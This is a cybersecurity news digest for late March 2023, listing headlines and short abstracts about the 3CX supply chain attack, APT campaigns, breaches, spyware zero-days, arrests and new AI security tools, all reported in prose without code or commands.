March, 2023
March 31, 2023 – General
The Role of International Assistance in Cyber Incident Response Full Text
Abstract
Some cybersecurity incidents can render crucial government services inaccessible, like recent events in Costa Rica and Vanuatu exemplify. In these cases, international assistance can be a key part of the response.Lawfare
March 31, 2023 – Vulnerabilities
Hackers are actively exploiting a flaw in the Elementor Pro WordPress plugin Full Text
Abstract
Threat actors are actively exploiting a high-severity flaw in the Elementor Pro WordPress plugin used by more than eleven million websites WordPress security firm PatchStack warns of a high-severity vulnerability in the Elementor Pro WordPress...Security Affairs
March 31, 2023 – Vulnerabilities
Here’s how attackers could have changed Bing search results Full Text
Abstract
An Azure Active Directory (AAD) misconfiguration by Microsoft in one of its own cloud-hosted applications could have allowed miscreants to subvert the IT giant's Bing search engine – even changing search results.Cyware
March 31, 2023 – Criminals
Cyber Police of Ukraine arrested members of a gang that defrauded EU citizens of $4.33M Full Text
Abstract
The Cyber Police of Ukraine, with law enforcement officials from Czechia, has arrested several members of a gang responsible for $4.33 million scam. The Cyber Police of Ukraine, with the support of law enforcement officials from the Czech Republic,...Security Affairs
March 31, 2023 – Government
Biden administration goes global in effort to constrain spyware use Full Text
Abstract
Acoalition of 11 countries committed on Thursday to counter the misuse of commercial spyware, a step toward building an international agreement to curb technology deployed by authoritarian countries to spy on dissidents and journalists.Cyware
March 31, 2023 – APT
Winter Vivern APT Targets European Government Entities with Zimbra Vulnerability Full Text
Abstract
The advanced persistent threat (APT) actor known as Winter Vivern is now targeting officials in Europe and the U.S. as part of an ongoing cyber espionage campaign. "TA473 since at least February 2023 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe," Proofpoint said in a new report. The enterprise security firm is tracking the activity under its own moniker TA473 (aka UAC-0114), describing it as an adversarial crew whose operations align with that of Russian and Belarussian geopolitical objectives. What it lacks in sophistication, it makes up for in persistence. In recent months, the group has been linked to attacks targeting state authorities of Ukraine and Poland as well as government officials in India, Lithuania, Slovakia, and the Vatican . The NATO-related intrusion wave entails the exploitation of CVE-2022-27926 (CVSS score:The Hacker News
March 31, 2023
Russian APT group Winter Vivern targets email portals of NATO and diplomats Full Text
Abstract
Russian hacking group Winter Vivern has been actively exploiting Zimbra flaws to steal the emails of NATO and diplomats. A Russian hacking group, tracked Winter Vivern (aka TA473), has been actively exploiting vulnerabilities (CVE-2022-27926) in unpatched...Security Affairs
March 31, 2023
Leaked Documents Detail Russia’s Cyberwarfare Tools, Including for OT Attacks Full Text
Abstract
The leaked documents, referred to as The Vulkan Files, were obtained by a whistleblower and analyzed by Mandiant in collaboration with several major media outlets in Europe and the United States.Cyware
March 31, 2023
Cyber Police of Ukraine Busted Phishing Gang Responsible for $4.33 Million Scam Full Text
Abstract
The Cyber Police of Ukraine, in collaboration with law enforcement officials from Czechia, has arrested several members of a cybercriminal gang that set up phishing sites to target European users. Two of the apprehended affiliates are believed to be organizers, with 10 others detained in other territories across the European Union. The suspects are alleged to have created more than 100 phishing portals aimed at users in France, Spain, Poland, Czechia, Portugal, and other nations in the region. These websites masqueraded as online portals offering heavily discounted products below market prices to lure unsuspecting users into placing fake "orders." In reality, the financial information entered on those websites to complete the payments were used to siphon money from the victims' accounts. "For the fraudulent scheme, the participants also created two call centers, in Vinnytsia and in Lviv, and involved operators in their work," the Cyber Police said . &quoThe Hacker News
March 31, 2023
Update: DXC Technology says global network is not compromised following Latitude Financial breach Full Text
Abstract
Soon after Latitude Financial revealed it suffered a cyberattack, DXC Technology quietly published a note on its website stating its global network and customer support networks were not compromised.Cyware
March 31, 2023
Deep Dive Into 6 Key Steps to Accelerate Your Incident Response Full Text
Abstract
Organizations rely on Incident response to ensure they are immediately aware of security incidents, allowing for quick action to minimize damage. They also aim to avoid follow on attacks or future related incidents. The SANS Institute provides research and education on information security. In the upcoming webinar, we'll outline , in detail, six components of a SANS incident response plan, including elements such as preparation, identification, containment, and eradication. The 6 steps of a complete IR Preparation: This is the first phase and involves reviewing existing security measures and policies; performing risk assessments to find potential vulnerabilities; and establishing a communication plan that lays out protocols and alerts staff to potential security risks. During the holidays, the preparation stage of your IR plan is crucial as it gives you the opportunity to communicate holiday-specific threats and put the wheels in motion to address such threats as they are identifThe Hacker News
March 31, 2023
Hack-for-Hire Groups Provide Corporate Espionage Full Text
Abstract
While hack-for-hire groups may advertise, they aren’t usually helping clients get a cryptocurrency payout. And you can’t sign up for a subscription service. It’s more than likely that hack-for-hire clients have a specific target and goal in mind.Cyware
March 31, 2023
3CX Supply Chain Attack — Here’s What We Know So Far Full Text
Abstract
Enterprise communications software maker 3CX on Thursday confirmed that multiple versions of its desktop app for Windows and macOS are affected by a supply chain attack . The version numbers include 18.12.407 and 18.12.416 for Windows and 18.11.1213, 18.12.402, 18.12.407, and 18.12.416 for macOS. The company said it's engaging the services of Google-owned Mandiant to review the incident. In the interim, it's urging its customers of self-hosted and on-premise versions of the software to update to version 18.12.422. "3CX Hosted and StartUP users do not need to update their servers as we will be updating them over the night automatically," 3CX CEO Nick Galea said in a blog post. "Servers will be restarted and the new Electron App MSI/DMG will be installed on the server." Evidence available so far points to either a compromise of 3CX's software build pipeline to distribute Windows and macOS versions of the app package, or alternatively, the poisoThe Hacker News
March 31, 2023
The US Is Sending Money to Countries Devastated by Cyberattacks Full Text
Abstract
Almost a year after the crisis began, a senior White House official told reporters today that the United States plans to provide $25 million in cybersecurity assistance to help Costa Rica strengthen its digital infrastructure.Cyware
March 30, 2023 – Cryptocurrency
Tor Goes Wrong: Malware Steals $400k in Cryptocurrency Full Text
Abstract
Are you a crypto user addicted to Tor? Tor browser users across the world are under attack with trojanized versions of Tor browser installers, especially those in Russia and nearby regions. These infected browsers were being promoted as "security-strengthened" versions of the browser. Kaspersky war ... Read MoreCyware
March 30, 2023 – Vulnerabilities
Researchers Detail Severe “Super FabriXss” Vulnerability in Microsoft Azure SFX Full Text
Abstract
Details have emerged about a now-patched vulnerability in Azure Service Fabric Explorer ( SFX ) that could lead to unauthenticated remote code execution. Tracked as CVE-2023-23383 (CVSS score: 8.2), the issue has been dubbed "Super FabriXss" by Orca Security, a nod to the FabriXss flaw (CVE-2022-35829, CVSS score: 6.2) that was fixed by Microsoft in October 2022. "The Super FabriXss vulnerability enables remote attackers to leverage an XSS vulnerability to achieve remote code execution on a container hosted on a Service Fabric node without the need for authentication," security researcher Lidor Ben Shitrit said in a report shared with The Hacker News. XSS refers to a kind of client-side code injection attack that makes it possible to upload malicious scripts into otherwise trusted websites. The scripts then get executed every time a victim visits the compromised website, thereby leading to unintended consequences. While both FabriXss and Super FabriXssThe Hacker News
March 30, 2023 – Vulnerabilities
Super FabriXss vulnerability in Microsoft Azure SFX could lead to RCE Full Text
Abstract
Researchers shared details about a flaw, dubbed Super FabriXss, in Azure Service Fabric Explorer (SFX) that could lead to unauthenticated remote code execution. Researchers from Orca Security shared details about a new vulnerability, dubbed Super...Security Affairs
March 30, 2023 – Malware
DBatLoader Sweeps European Countries With Multiple Malware Payloads Full Text
Abstract
A new phishing campaign has surfaced to drop Remcos RAT and Formbook malware through DBatLoader malware loader, revealed Zscaler researchers. The campaign is aimed at compromising systems in Europe. Actors also leverage a multi-layered obfuscated HTML file and OneNote attachments to propagate the D ... Read MoreCyware
March 30, 2023 – Hacker
Chinese RedGolf Group Targeting Windows and Linux Systems with KEYPLUG Backdoor Full Text
Abstract
A Chinese state-sponsored threat activity group tracked as RedGolf has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG. "RedGolf is a particularly prolific Chinese state-sponsored threat actor group that has likely been active for many years against a wide range of industries globally," Recorded Future told The Hacker News. "The group has shown the ability to rapidly weaponize newly reported vulnerabilities (e.g. Log4Shell and ProxyLogon ) and has a history of developing and using a large range of custom malware families." The use of KEYPLUG by Chinese threat actors was first disclosed by Google-owned Manidant in March 2022 in attacks targeting multiple U.S. state government networks between May 2021 and February 2022. Then in October 2022, Malwarebytes detailed a separate set of attacks targeting government entities in Sri Lanka in early August that leveraged a novel implant dubbed DBoxAgent to deploy KEYPLUG. BotThe Hacker News
March 30, 2023 – Malware
New AlienFox toolkit harvests credentials for tens of cloud services Full Text
Abstract
AlienFox is a novel comprehensive toolset for harvesting credentials for multiple cloud service providers, SentinelLabs reported. AlienFox is a new modular toolkit that allows threat actors to harvest credentials for multiple cloud service providers. AlienFox...Security Affairs
March 30, 2023 – Phishing
AI chatbots making it harder to spot phishing emails, say experts Full Text
Abstract
AI allows you to craft very believable ‘spear-phishing’ emails and other written communication with very little effort, especially compared to what you have to do before.Cyware
March 30, 2023 – Vulnerabilities
New Wi-Fi Protocol Security Flaw Affecting Linux, Android and iOS Devices Full Text
Abstract
A group of academics from Northeastern University and KU Leuven has disclosed a fundamental design flaw in the IEEE 802.11 Wi-Fi protocol standard, impacting a wide range of devices running Linux, FreeBSD, Android, and iOS. Successful exploitation of the shortcoming could be abused to hijack TCP connections or intercept client and web traffic, researchers Domien Schepers, Aanjhan Ranganathan, and Mathy Vanhoef said in a paper published this week. The approach exploits power-save mechanisms in endpoint devices to trick access points into leaking data frames in plaintext, or encrypt them using an all-zero key . "The unprotected nature of the power-save bit in a frame's header [...] also allows an adversary to force queue frames intended for a specific client resulting in its disconnection and trivially executing a denial-of-service attack," the researchers noted. In other words, the goal is to leak frames from the access point destined to a victim client stationThe Hacker News
March 30, 2023 – Attack
3CX voice and video conferencing software victim of a supply chain attack Full Text
Abstract
Popular voice and video conferencing software 3CX was the victim of a supply chain attack, SentinelOne researchers reported. As of Mar 22, 2023, SentinelOne observed a spike in behavioral detections of the 3CXDesktopApp, which is a popular voice and video...Security Affairs
March 30, 2023 – Business
DataDome, which uses AI to protect against bot-based attacks, raises $42M Full Text
Abstract
Benjamin Fabre founded DataDome in 2015 with Fabien Grenier, a longtime business partner, after the pair made the observation that most companies weren’t able to detect and block bots.Cyware
March 30, 2023 – Solution
Cyberstorage: Leveraging the Multi-Cloud to Combat Data Exfiltration Full Text
Abstract
Multi-cloud data storage, once merely a byproduct of the great cloud migration, has now become a strategy for data management. "Multi-cloud by design," and its companion the supercloud, is an ecosystem in which several cloud systems work together to provide many organizational benefits, including increased scale and overall resiliency. And now, even security teams who have long been the holdout on wide-scale cloud adoption, may find a reason to rejoice. Born out of the multi-cloud approach, cyberstorage enables companies to not only enjoy the benefits that multi-cloud brings but also eliminate the risk of data exposure at the same time, marking the beginning of the multi-cloud maturity era. What Is The Supercloud? While many organizations ended up with multiple cloud services as a byproduct of interdepartmental needs, today organizations are intentionally building multi-cloud environments. And rather than manage the various cloud services individually, many are implementinThe Hacker News
March 30, 2023 – Malware
New Mélofée Linux malware linked to Chinese APT groups Full Text
Abstract
Exatrack researchers warn of an unknown China-linked hacking group that has been linked to a new Linux malware, dubbed Mélofée. Cybersecurity researchers from ExaTrack recently discovered a previously undetected malware family, dubbed Mélofée,...Security Affairs
March 30, 2023 – Vulnerabilities
Azure Pipelines vulnerability spotlights supply chain threats Full Text
Abstract
The Azure Pipelines flaw affected both the SaaS version of Azure DevOps Server and the self-hosted, on-premises version. Customers running the on-premises version need to patch their instances to remediate the RCE vulnerability.Cyware
March 30, 2023 – Malware
AlienFox Malware Targets API Keys and Secrets from AWS, Google, and Microsoft Cloud Services Full Text
Abstract
A new "comprehensive toolset" called AlienFox is being distributed on Telegram as a way for threat actors to harvest credentials from API keys and secrets from popular cloud service providers. "The spread of AlienFox represents an unreported trend towards attacking more minimal cloud services, unsuitable for crypto mining, in order to enable and expand subsequent campaigns," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News. The cybersecurity company characterized the malware as highly modular and constantly evolving to accommodate new features and performance improvements. The primary use of AlienFox is to enumerate misconfigured hosts via scanning platforms like LeakIX and SecurityTrails , and subsequently leverage various scripts in the toolkit to extract credentials from configuration files exposed on the servers. Specifically, it entails searching for susceptible servers associated with popular web frameworThe Hacker News
March 30, 2023 – Malware
NullMixer Campaign Delivers New Polymorphic Loaders Full Text
Abstract
Researchers spotted a new malware operation, named NullMixer, that hit over 8,000 targets within a week, with a special focus on North America, Italy, and France. The attackers use SEO poisoning, along with social engineering tactics to lure their potential victims, consisting mostly of IT personne ... Read MoreCyware
March 30, 2023 – Attack
3CX Desktop App Supply Chain Attack Leaves Millions at Risk - Urgent Update on the Way! Full Text
Abstract
3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers. "The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls ICO files appended with Base64 data from GitHub and ultimately leads to a third-stage infostealer DLL," SentinelOne researchers said . The cybersecurity firm is tracking the activity under the name SmoothOperator , stating the threat actor registered a massive attack infrastructure as far back as February 2022. There are indications that the attack may have commenced around March 22, 2023. 3CX, the company behind 3CXDesktopApp, claims to have more than 600,000 customers and 12 million users in 190 countries, some of which include well-known names like American ExpresThe Hacker News
March 30, 2023 – General
Phishing Emails Up a Whopping 569% in 2022 Full Text
Abstract
The number of credential phishing emails sent spiked by 478%. Emotet and QakBot are the top malware families observed. For the eighth consecutive year, business email compromise (BEC) ranked as the top cybercrime.Cyware
March 30, 2023 – General
Cyber Storm Predicted at the 2023 World Economic Forum Full Text
Abstract
A majority of organizations reported that global geopolitical instability has influenced their cyber strategy “moderately” or “substantially”. Their biggest concerns regarding cyberattacks are business continuity (67%) and reputational damage (65%).Cyware
March 29, 2023 – Breach
Hackers compromise 3CX desktop app in a supply chain attack Full Text
Abstract
A digitally signed and trojanized version of the 3CX Voice Over Internet Protocol (VOIP) desktop client is reportedly being used to target the company's customers in an ongoing supply chain attack.BleepingComputer
March 29, 2023 – APT
Bitter APT Espionage Group Targets Nuclear Energy Firms in China Full Text
Abstract
The nuclear energy sector of China is reportedly facing threats from Bitter, a South Asian APT. The group specializes in using Excel exploits, Windows Installer (MSI) files, and Microsoft Compiled HTML Help (CHM) files. Besides, the group is infamous for targeting energy and government organization ... Read MoreCyware
March 29, 2023 – Privacy
Spyware Vendors Caught Exploiting Zero-Day Vulnerabilities on Android and iOS Devices Full Text
Abstract
A number of zero-day vulnerabilities that were addressed last year were exploited by commercial spyware vendors to target Android and iOS devices, Google's Threat Analysis Group (TAG) has revealed. The two distinct campaigns were both limited and highly targeted, taking advantage of the patch gap between the release of a fix and when it was actually deployed on the targeted devices. "These vendors are enabling the proliferation of dangerous hacking tools, arming governments that would not be able to develop these capabilities in-house," TAG's Clement Lecigne said in a new report. "While use of surveillance technologies may be legal under national or international laws, they are often found to be used by governments to target dissidents, journalists, human rights workers, and opposition party politicians." The first of the two operations took place in November 2022 and involved sending shortened links over SMS messages to users located in Italy, MalaysThe Hacker News
March 29, 2023 – Policy and Law
Enforcement of Cybersecurity Regulations: Part 2 Full Text
Abstract
While a valuable part of a cybersecurity program, “third-party audits” are too often not audits and not done by true third parties.Lawfare
March 29, 2023 – Vulnerabilities
QNAP fixed Sudo privilege escalation bug in NAS devices Full Text
Abstract
Taiwanese vendor QNAP warns customers to patch a high-severity Sudo privilege escalation bug affecting NAS devices. Taiwanese vendor QNAP warns customers to update their network-attached storage (NAS) devices to address a high-severity Sudo privilege...Security Affairs
March 29, 2023 – Breach
SafeMoon ‘burn’ bug abused to drain $8.9 million from liquidity pool Full Text
Abstract
The SafeMoon token liquidity pool lost $8.9 million after a hacker exploited a newly created 'burn' smart contract function that artificially inflated the price, allowing the actors to sell SafeMoon at a much higher price.BleepingComputer
March 29, 2023 – Hacker
Hackers Distribute MacStealer MaaS to Target Mac Users Full Text
Abstract
MacStealer is a new information-stealing malware threat attempting to pilfer sensitive information from compromised macOS devices. The malware uses Telegram as its C2 channel and specifically affects devices running Catalina and later versions on M1 and M2 CPUs. It can harvest documents, browser co ... Read MoreCyware
March 29, 2023 – Malware
Mélofée: Researchers Uncover New Linux Malware Linked to Chinese APT Groups Full Text
Abstract
An unknown Chinese state-sponsored hacking group has been linked to a novel piece of malware aimed at Linux servers. French cybersecurity firm ExaTrack, which found three samples of the previously documented malicious software that date back to early 2022, dubbed it Mélofée . One of the artifacts is designed to drop a kernel-mode rootkit that's based on an open source project referred to as Reptile . "According to the vermagic metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86_64," the company said in a report. "The rootkit has a limited set of features, mainly installing a hook designed for hiding itself." Both the implant and the rootkit are said to be deployed using shell commands that download an installer and a custom binary package from a remote server. The installer takes the binary package as an argument and then extracts the rootkit as well as a server implant module that's currently under active development. MéloféThe Hacker News
March 29, 2023 – Breach
Australia’s Casino Giant Crown Resorts disclosed data breach after Clop ransomware attack Full Text
Abstract
Australia's gambling and entertainment giant Crown Resorts, disclosed a data breach caused by the exploitation of recently discovered GoAnywhere zero-day. Australian casino giant Crown Resorts disclosed a data breach after the attack of the Cl0p ransomware...Security Affairs
March 29, 2023 – Vulnerabilities
QNAP warns customers to patch Linux Sudo flaw in NAS devices Full Text
Abstract
Taiwanese hardware vendor QNAP warns customers to secure their Linux-powered network-attached storage (NAS) devices against a high-severity Sudo privilege escalation vulnerability.BleepingComputer
March 29, 2023 – Denial Of Service
Killnet and AnonymousSudan DDoS attack Australian University websites; Threaten More Attacks Full Text
Abstract
As seen with past attacks from this group, these most recent attacks do not seem to be originating from a single botnet, and the attack methods and sources seem to vary, suggesting the involvement of multiple individual threat actors.Cyware
March 29, 2023 – Education
How to Build a Research Lab for Reverse Engineering — 4 Ways Full Text
Abstract
Malware analysis is an essential part of security researcher's work. But working with malicious samples can be dangerous — it requires specialized tools to record their activity, and a secure environment to prevent unintended damage. However, manual lab setup and configuration can prove to be a laborious and time-consuming process. In this article, we'll look at 4 ways to create a reverse engineering lab, discuss how to save time, and, potentially, improve the detection rate using a cloud service, and a recommended list of tools for a comprehensive setup. What is a malware analysis lab? In essence, a malware analysis lab provides a safe, isolated space for examining malware. The setup can range from a straightforward virtual machine using VirtualBox to a more intricate network of interconnected machines and actual networking hardware. But in this article, we'll look at building a lab tailored for static analysis, so what we will need is a secure environment where weThe Hacker News
March 29, 2023 – Vulnerabilities
OpenAI quickly fixed account takeover bugs in ChatGPT Full Text
Abstract
OpenAI addressed multiple severe vulnerabilities in the popular chatbot ChatGPT that could have been exploited to take over accounts. OpenAI addressed multiple severe vulnerabilities in ChatGPT that could have allowed attackers to take over user accounts...Security Affairs
March 29, 2023 – Vulnerabilities
Microsoft Defender mistakenly tagging URLs as malicious Full Text
Abstract
Microsoft Defender is mistakenly flagging legitimate links as malicious, with some customers having already received dozens of alert emails since the issues began over five hours ago.BleepingComputer
March 29, 2023 – General
New API Report Shows 400% Increase in Attackers Full Text
Abstract
The report also found that 80% of attacks happened over authenticated APIs, making it a widespread problem for all. Given that it is one of the easiest types of attack to execute, it is no surprise that attackers are increasingly taking this route.Cyware
March 29, 2023 – General
Smart Mobility has a Blindspot When it Comes to API Security Full Text
Abstract
The emergence of smart mobility services and applications has led to a sharp increase in the use of APIs in the automotive industry. However, this increased reliance on APIs has also made them one of the most common attack vectors. According to Gartner, APIs account for 90% of the web application attack surface areas. With no surprise, similar trends are emerging also in the smart mobility space. A recent Automotive and Smart Mobility Cybersecurity Report by Upstream Security indicates that the automotive and smart mobility ecosystem has seen a 380% increase in API-based incidents in 2022, compared to 2021. Additionally, APIs accounted for 12% of total cyber incidents in 2022, up from only 2% in 2021. When examining smart mobility applications and services, Upstream's threat intelligence team reported that black-hat actors were found to be behind 53% of incidents, indicating malicious intent as the driving force of the majority of API-related attacks. The impact of these inThe Hacker News
March 29, 2023 – Privacy
Google TAG shares details about exploit chains used to install commercial spyware Full Text
Abstract
Google's Threat Analysis Group (TAG) discovered several exploit chains targeting Android, iOS, and Chrome to install commercial spyware. Google's Threat Analysis Group (TAG) shared details about two distinct campaigns which used several zero-day exploits...Security Affairs
March 29, 2023 – Privacy
Google finds more Android, iOS zero-days used to install spyware Full Text
Abstract
Google's Threat Analysis Group (TAG) discovered several exploit chains using Android, iOS, and Chrome zero-day and n-day vulnerabilities to install commercial spyware and malicious apps on targets' devices.BleepingComputer
March 29, 2023 – General
Ransomware gunning for transport sector’s OT systems next Full Text
Abstract
ENISA says the three dominant threats to the transportation sector are ransomware (38 percent), data-related threats (30 percent), and malware (17 percent). However, each subgroup has reported experiencing other attack types than ransomware.Cyware
March 29, 2023 – Cryptocurrency
Trojanized TOR Browser Installers Spreading Crypto-Stealing Clipper Malware Full Text
Abstract
Trojanized installers for the TOR anonymity browser are being used to target users in Russia and Eastern Europe with clipper malware designed to siphon cryptocurrencies since September 2022. "Clipboard injectors [...] can be silent for years, show no network activity or any other signs of presence until the disastrous day when they replace a crypto wallet address," Vitaly Kamluk, director of global research and analysis team (GReAT) for APAC at Kaspersky, said . Another notable aspect of clipper malware is that its nefarious functions are not triggered unless the clipboard data meet specific criteria, making it more evasive. It's not immediately clear how the installers are distributed, but evidence points to the use of torrent downloads or some unknown third-party source since the Tor Project's website has been subjected to blockades in Russia in recent years. Regardless of the method used, the installer launches the legitimate executable, while also sThe Hacker News
March 29, 2023 – Attack
Clipper attacks use Trojanized TOR Browser installers Full Text
Abstract
Researchers discovered malware-laced installers for the TOR browser that is spreading clipper malware in Russia and Eastern Europe. Kaspersky researchers discovered a Trojanized version of the Tor Browser that is spreading a clipper malware in Russia...Security Affairs
March 29, 2023 – Malware
Spyware Vendors Use 0-days and n-days Against Popular Platforms Full Text
Abstract
In this blog, researchers have shared details about two distinct campaigns that used various 0-day exploits against Android, iOS, and Chrome and were both limited and highly targeted.Cyware
March 29, 2023 – APT
North Korean APT43 Group Uses Cybercrime to Fund Espionage Operations Full Text
Abstract
A new North Korean nation-state cyber operator has been attributed to a series of campaigns orchestrated to gather strategic intelligence that aligns with Pyongyang's geopolitical interests since 2018. Google-owned Mandiant, which is tracking the activity cluster under the moniker APT43 , said the group's motives are both espionage- and financially-motivated, leveraging techniques like credential harvesting and social engineering to further its objectives. The monetary angle to its attack campaigns is an attempt on the part of the threat actor to generate funds to meet its "primary mission of collecting strategic intelligence." Victimology patterns suggest that targeting is focused on South Korea, the U.S., Japan, and Europe, spanning government, education, research, policy institutes, business services, and manufacturing sectors. The threat actor was also observed straying off course by striking health-related verticals and pharma companies from October 2020The Hacker News
March 29, 2023 – Criminals
DarkBit puts data from Israel’s Technion university on sale Full Text
Abstract
The ransomware attack hit Technion on February 12, forcing the university to block all communication networks. DarkBit originally demanded 80 bitcoins as ransom from the university.Cyware
March 29, 2023 – Solution
Microsoft Security Copilot is a new GPT-4 AI assistant for cybersecurity Full Text
Abstract
Powered by OpenAI’s GPT-4 generative AI and Microsoft’s security-specific model, Security Copilot looks like a simple prompt box like any other chatbot. You can ask “what are all the security incidents in my enterprise?”Cyware
March 29, 2023 – Attack
Google Found Two Spyware Campaigns Targeting Apple and Android Devices Full Text
Abstract
The company did not reveal the spyware vendors involved but said one of the campaigns used a link directing targets to a landing page identical to one Google revealed in November 2022 from Spanish spyware firm Variston IT.Cyware
March 28, 2023 – Malware
Trojanized Tor browsers target Russians with crypto-stealing malware Full Text
Abstract
A surge of trojanized Tor Browser installers targets Russians and Eastern Europeans with clipboard-hijacking malware that steals infected users' cryptocurrency transactions.BleepingComputer
March 28, 2023 – Vulnerabilities
WiFi protocol flaw allows attackers to hijack network traffic Full Text
Abstract
Cybersecurity researchers have discovered a fundamental security flaw in the design of the IEEE 802.11 WiFi protocol standard, allowing attackers to trick access points into leaking network frames in plaintext form.BleepingComputer
March 28, 2023 – General
Microsoft brings GPT-4-powered Security Copilot to incident response Full Text
Abstract
Microsoft today announced Security Copilot, a new ChatGPT-like assistant powered by artificial intelligence that takes advantage of Microsoft's threat intelligence footprint to make faster decisions during incident response and to help with threat hunting and security reporting.BleepingComputer
March 28, 2023 – Breach
Crown Resorts confirms ransom demand after GoAnywhere breach Full Text
Abstract
Crown Resorts, Australia's largest gambling and entertainment company, has confirmed that it suffered a data breach after its GoAnywhere secure file-sharing server was breached using a zero-day vulnerability.BleepingComputer
March 28, 2023 – APT
Newly exposed APT43 hacking group targeting US orgs since 2018 Full Text
Abstract
A new North Korean hacking group has been revealed to be targeting government organizations, academics, and think tanks in the United States, Europe, Japan, and South Korea for the past five years.BleepingComputer
March 28, 2023 – Education
The End-User Password Mistakes Putting Your Organization at Risk Full Text
Abstract
Though there are many ways to create passwords, not all are equally effective. It is important to consider the various ways a password-protected system can fail.BleepingComputer
March 28, 2023 – Breach
Latitude Financial data breach now impacts 14 million customers Full Text
Abstract
Australian loan giant Latitude Financial Services (Latitude) is warning customers that its data breach is much more significant than initially stated, taking the number of affected individuals from 328,000 to 14 million.BleepingComputer
March 28, 2023 – Policy and Law
Three Lawsuits Filed Against BetterHelp in Wake of FTC Action Full Text
Abstract
BetterHelp is facing at least three proposed class action lawsuits after earlier this month settling allegations with the FTC that it violated users' privacy by sharing identifying information with social media platforms including Facebook.Cyware
March 28, 2023 – Solution
Microsoft Introduces GPT-4 AI-Powered Security Copilot Tool to Empower Defenders Full Text
Abstract
Microsoft on Tuesday unveiled Security Copilot in preview, marking its continued push to embed AI-oriented features in an attempt to offer "end-to-end defense at machine speed and scale." Powered by OpenAI's GPT-4 generative AI and its own security-specific model, it's billed as a security analysis tool that enables cybersecurity analysts to quickly respond to threats, process signals, and assess risk exposure. To that end, it collates insights and data from various products like Microsoft Sentinel, Defender, and Intune to help security teams better understand their environment; determine if they are susceptible to known vulnerabilities and exploits; identify ongoing attacks their scale, and receive remediation instructions; and summarize incidents. Users, for instance, can ask Security Copilot about suspicious user logins over a specific time period, or even employ it to create a PowerPoint presentation outlining an incident and its attack chain. It can alThe Hacker News
March 28, 2023 – Breach
Toyota Italy accidentally leaked sensitive data Full Text
Abstract
Toyota Italy accidentally leaked sensitive data for more than one-and-a-half years, until this March, CyberNews reported. A Japanese multinational accidentally leaked access to its marketing tools, enabling attackers to launch phishing campaigns against...Security Affairs
March 28, 2023 – Attack
Lumen Technologies hit with two separate security incidents Full Text
Abstract
The company has notified law enforcement and is working with outside firms to contain the incidents, according to the filing. It has begun business continuity efforts to restore functionality to its customers’ systems.Cyware
March 28, 2023 – APT
Pakistan-Origin SideCopy Linked to New Cyberattack on India’s Ministry of Defence Full Text
Abstract
An advanced persistent threat (APT) group that has a track record of targeting India and Afghanistan has been linked to a new phishing campaign that delivers Action RAT. According to Cyble, which attributed the operation to SideCopy , the activity cluster is designed to target the Defence Research and Development Organization ( DRDO ), the research and development wing of India's Ministry of Defence. Known for emulating the infection chains associated with SideWinder to deliver its own malware, SideCopy is a threat group of Pakistani origin that shares overlaps with Transparent Tribe . It has been active since at least 2019. Attack chains mounted by the group involve using spear-phishing emails to gain initial access. These messages come bearing a ZIP archive file that contains a Windows shortcut file (.LNK) masquerading as information about the K-4 ballistic missile developed by DRDO. Executing the .LNK file leads to the retrieval of an HTML application from a remoteThe Hacker News
March 28, 2023 – APT
Bitter APT group targets China’s nuclear energy sector Full Text
Abstract
Intezer researchers reported that a South Asian espionage group, tracked as Bitter, is targeting the Chinese nuclear energy industry. Intezer researchers uncovered a cyberespionage campaign targeting the Chinese nuclear energy sector, they linked...Security Affairs
March 28, 2023 – General
More School Closings Coast-to-Coast Due to Ransomware Full Text
Abstract
Instead of snow days, students now get cyber days off. Cyberattacks are affecting school districts of all sizes from coast-to-coast. Some schools even completely shut down due to the attacks.Cyware
March 28, 2023 – Malware
IcedID Malware Shifts Focus from Banking Fraud to Ransomware Delivery Full Text
Abstract
Multiple threat actors have been observed using two new variants of the IcedID malware in the wild with more limited functionality that removes functionality related to online banking fraud. IcedID, also known as BokBot, started off as a banking trojan in 2017. It's also capable of delivering additional malware, including ransomware. "The well-known IcedID version consists of an initial loader which contacts a Loader [command-and-control] server, downloads the standard DLL Loader, which then delivers the standard IcedID Bot," Proofpoint said in a new report published Monday. One of the new versions is a Lite variant that was previously highlighted as being dropped as a follow-on payload by the Emotet malware in November 2022. Also newly observed in February 2023 is a Forked variant of IcedID. Both these variants are designed to drop what's called a Forked version of IcedID Bot that leaves out the web injects and backconnect functionality that would typicThe Hacker News
March 28, 2023 – Breach
Latitude Data breach is worse than initially estimated. 14 million individuals impacted Full Text
Abstract
Australian loan giant Latitude Financial Services (Latitude) revealed that a data breach its has suffered impacted 14 million customers. The data breach suffered by Latitude Financial Services (Latitude) is much more serious than initially estimated....Security Affairs
March 28, 2023 – General
TikTok Faces Further Bans in Europe Full Text
Abstract
The French Ministry of Transformation and Public Service on Friday announced a ban on all "recreational apps" from government-issued mobile devices, to take effect immediately.Cyware
March 28, 2023 – Solution
Breaking the Mold: Pen Testing Solutions That Challenge the Status Quo Full Text
Abstract
Malicious actors are constantly adapting their tactics, techniques, and procedures (TTPs) to adapt to political, technological, and regulatory changes quickly. A few emerging threats that organizations of all sizes should be aware of include the following: Increased use of Artificial Intelligence and Machine Learning : Malicious actors are increasingly leveraging AI and machine learning to automate their attacks, allowing them to scale their operations faster than ever before. The exploitation of cloud-based technologies: Cloud-based services are increasingly being targeted by malicious actors due to the lack of visibility and control over these platforms. Increased use of ransomware: Ransomware is becoming a more popular method of attack, allowing malicious actors to monetize their operations quickly. According to CompTIA , ransomware attacks grew by 41% in 2022, while identification and remediation for a breach took 49 days longer than average. Phishing attacks also increasThe Hacker News
March 28, 2023 – Criminals
Europol warns of criminal use of ChatGPT Full Text
Abstract
Europol warns of cybercriminal organizations can take advantage of systems based on artificial intelligence like ChatGPT. EU police body Europol warned about the potential abuse of systems based on artificial intelligence, such as the popular chatbot...Security Affairs
March 28, 2023 – Phishing
Nigerian BEC Scammer Sentenced to Prison in US Full Text
Abstract
The man from Lagos participated in multiple BEC, credit card, work-from-home, check-cashing, and romance scams targeting banks, businesses, and individuals in the US and abroad, including First American Holding Company and MidFirst Bank.Cyware
March 28, 2023 – Malware
